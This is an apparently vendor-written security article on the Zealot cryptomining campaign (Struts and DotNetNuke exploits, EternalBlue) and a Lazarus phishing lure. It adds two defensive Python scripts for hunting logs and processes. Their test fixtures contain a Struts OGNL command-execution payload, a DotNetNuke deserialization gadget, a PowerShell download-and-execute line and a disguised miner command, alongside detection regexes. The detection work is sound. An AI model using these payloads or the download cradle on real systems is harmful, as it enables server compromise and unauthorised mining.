“Zealot” Campaign and the Lazarus Group End the Year With Cryptocurrency Mining Attacks

With cryptocurrency prices hitting new highs recently, it is no surprise that cybercriminals are becoming more aggressive about profiting from these digital currencies. In the past few days, two cryptocurrency-related security incidents came to light: one aims to install a Monero miner on compromised servers, the other uses phishing emails to target financial organizations that deal in cryptocurrency.

The first of these incidents, known as the “Zealot” campaign after zealot.zip, the name of one of the files dropped on compromised systems, exploits two vulnerabilities: CVE-2017-5638 and CVE-2017-9822. CVE-2017-5638 is a remote code execution flaw in the Jakarta multipart parser of Apache Struts 2, notable for being the same vulnerability used in the Equifax breach disclosed in September. CVE-2017-9822 is a remote code execution flaw in DotNetNuke, a widely used ASP.NET web content management system, triggered by deserializing untrusted data supplied in the DNNPersonalization cookie. Beyond the specific bugs, the campaign shows that internet-facing application frameworks and content management systems such as Struts and DotNetNuke are attractive entry points: both flaws are reachable without authentication, so a single crafted request can be enough to gain code execution on the server.
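Both entry points leave recognizable artifacts in the HTTP request itself, which makes them easy to hunt for in proxy or WAF logs. The following is an added example, not code from the article or from Trend Micro: it runs two checks over a handful of constructed request records (the IPs, paths and payload strings are made up for illustration). For CVE-2017-5638 it looks for an OGNL expression in the Content-Type header; for CVE-2017-9822 it URL-decodes the DNNPersonalization cookie and flags known deserialization gadget names or an item type outside a small allowlist of benign .NET types (the allowlist is an assumption to extend for your site).

```python
"""Hunt HTTP request records for the two Zealot web entry points.

Added example, not from the article or from Trend Micro. Sample requests
are constructed; detection rules are assumptions to tune for your site.
"""
import re
from urllib.parse import quote, unquote

# --- constructed sample traffic (not captured data) ---------------------------
BENIGN_PROFILE = ('<profile><item key="name1:key1" type="System.String">'
                  '<string>hello</string></item></profile>')
GADGET_PROFILE = ('<profile><item key="name1: key1" '
                  'type="System.Data.Services.Internal.ExpandedWrapper`1[[System.Windows.Markup.XamlReader, '
                  'PresentationFramework]], System.Data.Services"><ExpandedWrapperOfXamlReader>'
                  '<ProjectedProperty0><MethodName>Parse</MethodName></ProjectedProperty0>'
                  '</ExpandedWrapperOfXamlReader></item></profile>')
ODD_TYPE_PROFILE = '<profile><item key="k" type="Contoso.Gadget, Contoso"><x/></item></profile>'
OGNL_CT = ("%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
           "(#cmd='id').(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())}")

SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "GET", "path": "/showcase/index.action",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"}},
    {"src": "198.51.100.7", "method": "POST", "path": "/showcase/upload.action",
     "headers": {"Content-Type": OGNL_CT}},
    {"src": "203.0.113.22", "method": "GET", "path": "/Default.aspx",
     "headers": {"Cookie": "DNNPersonalization=" + quote(BENIGN_PROFILE)}},
    {"src": "198.51.100.9", "method": "GET", "path": "/Default.aspx",
     "headers": {"cookie": "__RequestVerificationToken=abc; DNNPersonalization=" + quote(GADGET_PROFILE)}},
    {"src": "198.51.100.12", "method": "GET", "path": "/Default.aspx",
     "headers": {"Cookie": "DNNPersonalization=" + quote(ODD_TYPE_PROFILE)}},
]

# --- detection rules (assumptions; tune for your environment) ------------------
# CVE-2017-5638: the OGNL payload rides in Content-Type and starts with "%{" or "${".
OGNL_MARKERS = re.compile(r"[%$]\{|#_memberAccess|DEFAULT_MEMBER_ACCESS|ognl\.OgnlContext", re.I)
# CVE-2017-9822: a legitimate profile cookie only carries simple value types.
SAFE_DNN_TYPES = {"System.String", "System.Int32", "System.Boolean", "System.DateTime", "System.Double"}
GADGET_HINTS = re.compile(r"ObjectDataProvider|ExpandedWrapper|XamlReader|System\.Diagnostics\.Process", re.I)
TYPE_ATTR = re.compile(r'type="([^"]+)"')


def struts_finding(headers):
    """Return a reason string if the Content-Type header carries an OGNL expression."""
    m = OGNL_MARKERS.search(headers.get("content-type", ""))
    return f"OGNL marker {m.group(0)!r} in Content-Type" if m else None


def cookie_value(cookie_header, name):
    """Pull one cookie out of a raw Cookie header, URL-decoded; None if absent."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return unquote(value)
    return None


def dnn_finding(headers):
    """Return a reason string if DNNPersonalization carries a gadget or an unexpected item type."""
    profile = cookie_value(headers.get("cookie", ""), "DNNPersonalization")
    if profile is None:
        return None
    m = GADGET_HINTS.search(profile)
    if m:
        return f"deserialization gadget {m.group(0)!r} in DNNPersonalization"
    for full_type in TYPE_ATTR.findall(profile):
        base = full_type.split(",")[0].split("`")[0].strip()  # drop assembly and generic arity
        if base not in SAFE_DNN_TYPES:
            return f"unexpected item type {base!r} in DNNPersonalization"
    return None


def scan(requests):
    """Run both checks over every request; header names are compared case-insensitively."""
    findings = []
    for req in requests:
        headers = {k.lower(): v for k, v in req["headers"].items()}
        for cve, check in (("CVE-2017-5638", struts_finding), ("CVE-2017-9822", dnn_finding)):
            reason = check(headers)
            if reason:
                findings.append({"src": req["src"], "path": req["path"], "cve": cve, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"{f['src']:<15} {f['cve']}  {f['path']}  {f['reason']}")
```

Run against the constructed records, the scan flags the OGNL request and the two suspicious cookies while leaving the benign Struts and DotNetNuke requests alone. The allowlist check is the useful general rule: it catches gadget chains that do not match any name on the hint list, at the cost of a review queue if your site stores unusual profile types.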

For Windows hosts it has compromised, the campaign also uses EternalBlue and EternalSynergy, two of the SMBv1 exploits released by the Shadow Brokers group earlier this year (and fixed by Microsoft's MS17-010 update in March), to move laterally within the network. Finally, the attackers use PowerShell to download and install a Monero miner. So far, the campaign has reportedly generated around $8,500 worth of Monero.

The second incident involves the Lazarus group, which has been linked to the 2016 Bangladesh Bank heist. Here the group relies on a classic spear-phishing lure to steal bitcoin: emails purporting to advertise a CFO position at a European cryptocurrency company are sent to staff of cryptocurrency financial organizations. The attached Microsoft Word document contains a malicious macro; when the recipient opens the file and enables macros, the macro loads a Trojan that steals credentials and downloads additional malware.

These two incidents are a study in contrasts: Zealot is fairly sophisticated, chaining multiple vulnerabilities and exploits, while Lazarus relies on a tried-and-true social engineering technique that is no less effective. Although the attacks are not connected, they share a common feature: cryptocurrency. Cryptocurrencies differ from traditional currency (beyond the obvious physical-virtual distinction) in the way they are created, mainly through mining, which requires substantial computational work from the “miners” that validate transactions. Cryptocurrency mining malware turns large numbers of infected machines into miners that form a botnet working for the attacker's wallet; Monero in particular is favored because its proof-of-work algorithm can be mined profitably on ordinary CPUs, which is exactly what compromised servers offer. For the victims, the most noticeable impact is increased resource use and wear and tear on their machines. What makes miners particularly insidious is that they can go virtually unnoticed, since a slower system is often attributed to non-malicious causes.

Fortunately, the impact of cryptocurrency mining malware can be minimized through best practices, most of which are already part of standard security hygiene:

  • Malware that exploits vulnerabilities can be mitigated by regularly updating and patching systems. In this campaign, fixes for every bug used (the Struts and DotNetNuke flaws and the SMB exploits) were available months before the attacks.
  • Strong device credentials prevent unauthorized access by malicious actors.
  • Firewalls and intrusion detection and prevention systems can stop incursion attempts; the exploits above leave recognizable artifacts in HTTP and SMB traffic.
  • Knowing the tell-tale signs of common social engineering techniques, such as unsolicited emails, suspicious attachments, and dubious websites, helps both users and organizations recognize attacks before they affect the system. Blocking macros in documents received from the internet removes the Lazarus lure's delivery mechanism entirely.
  • For miner-specific signs, watch for performance hits such as a sluggish system, excessive fan noise and heat, or slow applications, and for unexpected processes that keep the CPU pegged or connect to mining pools.
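The symptoms in the last bullet can be checked rather than waited for. The following is an added example, not code from the article or from Trend Micro: it triages a constructed process snapshot (PIDs, names, command lines, CPU samples and remote endpoints are all made up) for the indicators discussed above, namely miner pool arguments on the command line, the PowerShell download cradle used by Zealot, and sustained CPU load combined with a connection to a mining-pool port. The pool-port list, CPU threshold and regular expressions are assumptions to tune for your environment; in production the snapshot would come from psutil, Get-Process or ps.

```python
"""Triage a process snapshot for cryptocurrency miner indicators.

Added example, not from the article or from Trend Micro. The snapshot is
constructed; thresholds, port list and regexes are assumptions.
"""
import re

# Assumed: ports commonly used by Monero mining pools (tune for your environment).
STRATUM_PORTS = {3333, 5555, 7777, 14444, 45700}
# Every CPU sample must reach this percentage before the load counts as "sustained".
SUSTAINED_CPU = 85.0

MINER_CMDLINE = re.compile(r"stratum\+(tcp|ssl)://|--donate-level|xmrig|minerd|cryptonight", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression|-enc(odedcommand)?\b|-w(indowstyle)? hidden", re.I)
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}

# Constructed snapshot (not real telemetry): cpu is a list of per-interval samples,
# remote is the list of (ip, port) endpoints the process is connected to.
SNAPSHOT = [
    {"pid": 412, "name": "sqlservr.exe", "cmdline": "sqlservr.exe -sMSSQLSERVER",
     "cpu": [35.0, 40.0, 38.0], "remote": [("10.0.0.5", 1433)]},
    {"pid": 1184, "name": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/m.ps1')\"",
     "cpu": [2.0, 1.0, 1.0], "remote": [("198.51.100.20", 80)]},
    {"pid": 2201, "name": "svchost.exe",
     "cmdline": "svchost.exe -o stratum+tcp://pool.example.net:3333 -u 44AbCdEf -p x --donate-level 1",
     "cpu": [97.5, 98.0, 96.0], "remote": [("198.51.100.30", 3333)]},
    {"pid": 2290, "name": "chrome.exe", "cmdline": "chrome.exe",
     "cpu": [91.0, 12.0, 8.0], "remote": [("203.0.113.5", 443)]},
    {"pid": 3010, "name": "ffmpeg.exe", "cmdline": "ffmpeg.exe -i in.mp4 out.mkv",
     "cpu": [95.0, 96.0, 94.0], "remote": []},
]


def triage_process(proc):
    """Return (severity, reason) pairs for one process; an empty list means nothing noteworthy."""
    reasons = []
    if MINER_CMDLINE.search(proc["cmdline"]):
        reasons.append(("high", "miner pool/config arguments in command line"))
    if proc["name"].lower().startswith("powershell") and CRADLE.search(proc["cmdline"]):
        reasons.append(("high", "PowerShell download-and-execute cradle"))
    samples = proc["cpu"]
    sustained = bool(samples) and min(samples) >= SUSTAINED_CPU
    pool_ports = sorted({port for _, port in proc["remote"] if port in STRATUM_PORTS})
    if sustained and pool_ports:
        reasons.append(("medium", f"sustained CPU >= {SUSTAINED_CPU:.0f}% with connection to pool port(s) {pool_ports}"))
    elif sustained:
        # One busy sample (the browser above) is not enough; every sample must be high.
        reasons.append(("low", f"sustained CPU >= {SUSTAINED_CPU:.0f}% over {len(samples)} samples, no pool connection"))
    return reasons


def triage(snapshot):
    """Run every process through triage_process and return findings, highest severity first."""
    findings = []
    for proc in snapshot:
        for severity, reason in triage_process(proc):
            findings.append({"pid": proc["pid"], "name": proc["name"], "severity": severity, "reason": reason})
    findings.sort(key=lambda f: (SEVERITY_RANK[f["severity"]], f["pid"]))
    return findings


if __name__ == "__main__":
    for f in triage(SNAPSHOT):
        print(f"{f['severity']:<6} pid={f['pid']:<5} {f['name']:<16} {f['reason']}")
```

On the constructed snapshot this reports the PowerShell cradle and the fake svchost miner as high, the miner's pool connection as medium, and the transcoder's legitimately high CPU as low for a human to dismiss; the browser's single busy sample produces nothing. Requiring every sample to be high is what keeps ordinary bursts out of the queue, which matters because "the system is slow" is, as noted above, the symptom most likely to be explained away.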

At the endpoint level, Trend Micro™ Smart Protection Suites deliver several capabilities like high-fidelity machine learning, web reputation services, behavior monitoring and application control, and vulnerability shielding that minimize the impact of this threat. 

